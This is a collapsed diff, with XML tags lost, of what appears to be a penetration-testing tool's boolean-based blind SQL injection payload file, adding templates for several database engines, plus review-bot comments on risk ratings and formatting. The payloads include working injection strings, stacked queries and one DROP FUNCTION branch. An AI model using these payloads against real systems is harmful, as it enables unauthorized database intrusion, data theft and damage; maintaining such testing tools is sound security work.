diff --git a/xml/payloads/01_boolean_blind.xml b/xml/payloads/01_boolean_blind.xml index 34cf5f2bc..dc7008767 100644 --- a/xml/payloads/01_boolean_blind.xml +++ b/xml/payloads/01_boolean_blind.xml @@ -32,7 +32,6 @@ Tag: Likelihood of a payload to damage the data integrity. Valid values: - 0: No risk 1: Low risk 2: Medium risk 3: High risk @@ -171,10 +170,27 @@ Tag: + + AND boolean-based blind - WHERE or HAVING clause (Generic comment) + 1 + 2 + 1 + 1 + 1 + AND [INFERENCE] + + AND [RANDNUM]=[RANDNUM] + -- + + + AND [RANDNUM]=[RANDNUM1] + + + AND boolean-based blind - WHERE or HAVING clause (MySQL comment) 1 - 4 + 3 1 1 1 @@ -192,24 +208,23 @@ Tag: - AND boolean-based blind - WHERE or HAVING clause (Generic comment) + OR boolean-based blind - WHERE or HAVING clause 1 - 4 - 1 + 1 + 3 1 - 1 - AND [INFERENCE] + 2 + OR ([INFERENCE]) - AND [RANDNUM]=[RANDNUM] - -- + OR ([RANDNUM]=[RANDNUM]) - AND [RANDNUM]=[RANDNUM1] + OR ([RANDNUM]=[RANDNUM1]) - OR boolean-based blind - WHERE or HAVING clause + OR boolean-based blind - WHERE or HAVING clause (Generic comment) 1 2 3 @@ -218,6 +233,7 @@ Tag: OR ([INFERENCE]) OR ([RANDNUM]=[RANDNUM]) + -- OR ([RANDNUM]=[RANDNUM1]) @@ -244,23 +260,6 @@ Tag: - - OR boolean-based blind - WHERE or HAVING clause (Generic comment) - 1 - 3 - 3 - 1 - 2 - OR ([INFERENCE]) - - OR ([RANDNUM]=[RANDNUM]) - -- - - - OR ([RANDNUM]=[RANDNUM1]) - - - MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) 1 
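Review bot: The entry rewritten into `OR boolean-based blind - WHERE or HAVING clause` in the third hunk now carries a risk of 3 while the AND forms keep 1, and nothing in the file records why; the legend at the top only names the levels. An injected OR condition widens the enclosing WHERE clause, so when the vulnerable statement is an UPDATE or DELETE the condition can match every row, which is exactly the data-integrity damage the legend describes. I would put that rationale on the legend's `3: High risk` line, e.g. `3: High risk (e.g. OR-based conditions, which can match every row when the injected statement modifies data)`, so later entries are rated consistently. The field assignment is inferred from the collapsed diff text, which has lost its XML tags.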
@@ -283,12 +282,28 @@ Tag: - Generic boolean-based blind - Parameter replace (original value) + Generic boolean-based blind - Parameter replace 1 2 1 1,2,3 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM1] ELSE 1/(SELECT 0) END)) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)) + + + + + Generic boolean-based blind - Parameter replace (original value) + 1 + 3 + 1 + 1,2,3 + 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) @@ -298,10 +313,29 @@ Tag: + + MySQL boolean-based blind - Parameter replace (MAKE_SET) + 1 + 4 + 1 + 1,2,3 + 3 + MAKE_SET([INFERENCE],[RANDNUM]) + + MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1]) + + + MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1]) + +
+ MySQL +
+
+ MySQL boolean-based blind - Parameter replace (MAKE_SET - original value) 1 - 3 + 5 1 1,2,3 3 @@ -318,12 +352,31 @@ Tag: - MySQL boolean-based blind - Parameter replace (ELT - original value) + MySQL boolean-based blind - Parameter replace (ELT) 1 4 1 1,2,3 3 + ELT([INFERENCE],[RANDNUM]) + + ELT([RANDNUM]=[RANDNUM],[RANDNUM1]) + + + ELT([RANDNUM]=[RANDNUM1],[RANDNUM1]) + +
+ MySQL +
+
+ + + MySQL boolean-based blind - Parameter replace (ELT - original value) + 1 + 5 + 1 + 1,2,3 + 3 ELT([INFERENCE],[ORIGVALUE]) ELT([RANDNUM]=[RANDNUM],[ORIGVALUE]) @@ -336,10 +389,29 @@ Tag: + + MySQL boolean-based blind - Parameter replace (bool*int) + 1 + 5 + 1 + 1,2,3 + 3 + ([INFERENCE])*[RANDNUM] + + ([RANDNUM]=[RANDNUM])*[RANDNUM1] + + + ([RANDNUM]=[RANDNUM1])*[RANDNUM1] + +
+ MySQL +
+
+ MySQL boolean-based blind - Parameter replace (bool*int - original value) 1 - 4 + 5 1 1,2,3 3 @@ -358,7 +430,7 @@ Tag: MySQL >= 5.0 boolean-based blind - Parameter replace (original value) 1 - 3 + 1 1 1,2,3 3 @@ -378,7 +450,7 @@ Tag: MySQL < 5.0 boolean-based blind - Parameter replace (original value) 1 - 4 + 2 1 1,2,3 3 @@ -395,18 +467,76 @@ Tag: - PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value) + PostgreSQL boolean-based blind - Parameter replace 1 3 - 2 + 1 1,2,3 3 - (SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) + (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)) - (SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM1] ELSE 1/(SELECT 0) END)) - (SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1) + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)) + +
+ PostgreSQL +
+
+ + + PostgreSQL boolean-based blind - Parameter replace (original value) + 1 + 4 + 1 + 1,2,3 + 3 + (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + +
+ PostgreSQL +
+
+ + + + PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES) + 1 + 3 + 1 + 1,2,3 + 3 + (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) + + (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) + + + (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1) + +
+ PostgreSQL +
+
+ + + PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value) + 1 + 4 + 1 + 1,2,3 + 3 + (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) + + (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) + + + (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)
PostgreSQL @@ -496,7 +626,7 @@ Tag: Generic boolean-based blind - GROUP BY and ORDER BY clauses 1 - 3 + 2 1 2,3 1 @@ -512,7 +642,7 @@ Tag: Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value) 1 - 4 + 3 1 2,3 1 @@ -532,6 +662,26 @@ Tag: 1 2,3 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) + +
+ MySQL + >= 5.0 +
+
+ + + MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (original value) + 1 + 4 + 1 + 2,3 + 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) @@ -552,6 +702,25 @@ Tag: 1 2,3 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + +
+ MySQL +
+
+ + + MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (original value) + 1 + 5 + 1 + 2,3 + 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) @@ -564,6 +733,70 @@ Tag:
+ + PostgreSQL boolean-based blind - GROUP BY and ORDER BY clauses + 1 + 3 + 1 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END)) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END)) + +
+ PostgreSQL +
+
+ + + + PostgreSQL boolean-based blind - ORDER BY clauses (original value) + 1 + 5 + 1 + 3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) + +
+ PostgreSQL +
+
+ + + + + PostgreSQL boolean-based blind - ORDER BY clauses (GENERATE_SERIES - original value) + 1 + 3 + 1 + + 3 + 1 + ,(SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) + + ,(SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) + + + ,(SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1) + +
+ PostgreSQL +
+
+ Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause 1 @@ -571,6 +804,27 @@ Tag: 1 3 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) + +
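Review bot: The `PostgreSQL boolean-based blind - ORDER BY clauses (GENERATE_SERIES - original value)` entry has an extra empty added line between what appear to be its risk and clause values (`+ 1 + 3 + 1 + + 3 + 1`), which no sibling entry in this hunk has; with the tags stripped in this view it is either a stray blank line or an empty element, and either way it should go. Its level of 3 is also lower than the 5 given to the plain `ORDER BY clauses (original value)` entry just above it, whereas elsewhere in this diff the GENERATE_SERIES original-value variant sits one level above its base (3 and 4 in the parameter-replace pair). If that ordering is unintended, change `3` to `4`; if it is deliberate, a one-line XML comment on why this entry ranks first would keep the ordering legible.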
+ Microsoft SQL Server + Sybase + Windows +
+
+ + + Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (original value) + 1 + 4 + 1 + 3 + 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) @@ -592,6 +846,25 @@ Tag: 1 2,3 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + +
+ Oracle +
+
+ + + Oracle boolean-based blind - GROUP BY and ORDER BY clauses (original value) + 1 + 4 + 1 + 2,3 + 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) @@ -611,6 +884,25 @@ Tag: 1 2,3 1 + ,IIF([INFERENCE],1,1/0) + + ,IIF([RANDNUM]=[RANDNUM],1,1/0) + + + ,IIF([RANDNUM]=[RANDNUM1],1,1/0) + +
+ Microsoft Access +
+
+ + + Microsoft Access boolean-based blind - GROUP BY and ORDER BY clauses (original value) + 1 + 4 + 1 + 2,3 + 1 ,IIF([INFERENCE],[ORIGVALUE],1/0) ,IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0) @@ -622,24 +914,102 @@ Tag: Microsoft Access - - - - PostgreSQL stacked conditional-error blind queries + SAP MaxDB boolean-based blind - GROUP BY and ORDER BY clauses 1 3 - 0 - 0 - 2 - ; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) + 1 + 2,3 + 1 + ,(CASE WHEN [INFERENCE] THEN 1 ELSE NULL END) - ; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) + ,(CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END) + + + ,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END) + +
+ SAP MaxDB +
+
+ + + SAP MaxDB boolean-based blind - GROUP BY and ORDER BY clauses (original value) + 1 + 4 + 1 + 2,3 + 1 + ,(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END) + + ,(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END) + + + ,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END) + +
+ SAP MaxDB +
+
+ + + + + MySQL >= 5.0 boolean-based blind - Stacked queries + 1 + 3 + 1 + 0 + 1 + ;(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) + + ;(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) + # + + + ;(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) + +
+ MySQL + >= 5.0 +
+
+ + + MySQL < 5.0 boolean-based blind - Stacked queries + 1 + 4 + 1 + 0 + 1 + (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + # + + + (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + +
+ MySQL +
+
+ + + PostgreSQL boolean-based blind - Stacked queries + 1 + 2 + 1 + 0 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) -- - ; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)
PostgreSQL
@@ -647,19 +1017,19 @@ Tag: - Microsoft SQL Server/Sybase stacked conditional-error blind queries + Microsoft SQL Server/Sybase boolean-based blind - Stacked queries 1 - 3 - 0 + 2 + 1 0 1 - ; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] + ;IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] - ; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] + ;IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] -- - ; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] + ;IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]
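Review bot: The two new SAP MaxDB entries write the placeholder bare, `CASE WHEN [INFERENCE] THEN 1 ELSE NULL END`, while every other CASE expression in this file wraps it as `([INFERENCE])`. If the omission is deliberate for MaxDB's parser, an XML comment above the entry saying so would stop the next cleanup from "fixing" it; otherwise use the parenthesised form so the entries read like their siblings. The enclosing test elements close outside the hunk's visible text.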
Microsoft SQL Server
@@ -667,5 +1037,5 @@ Tag: Windows
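Review bot: The risk value of the `Microsoft SQL Server/Sybase boolean-based blind - Stacked queries` entry moves from 0 to 1 although its ELSE branch is a DDL statement, `ELSE DROP FUNCTION [RANDSTR]`, and the legend defines risk as the likelihood of damaging data integrity. Rating it alongside the SELECT-only entries is presumably justified by `[RANDSTR]` being a random name that is not expected to exist, but nothing in the file says so; a short XML comment above the entry, e.g. `<!-- risk 1: DROP FUNCTION targets [RANDSTR], a random name assumed not to exist; verify before changing the rating -->`, would keep that reasoning next to the value. The enclosing test element closes outside the hunk.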
- +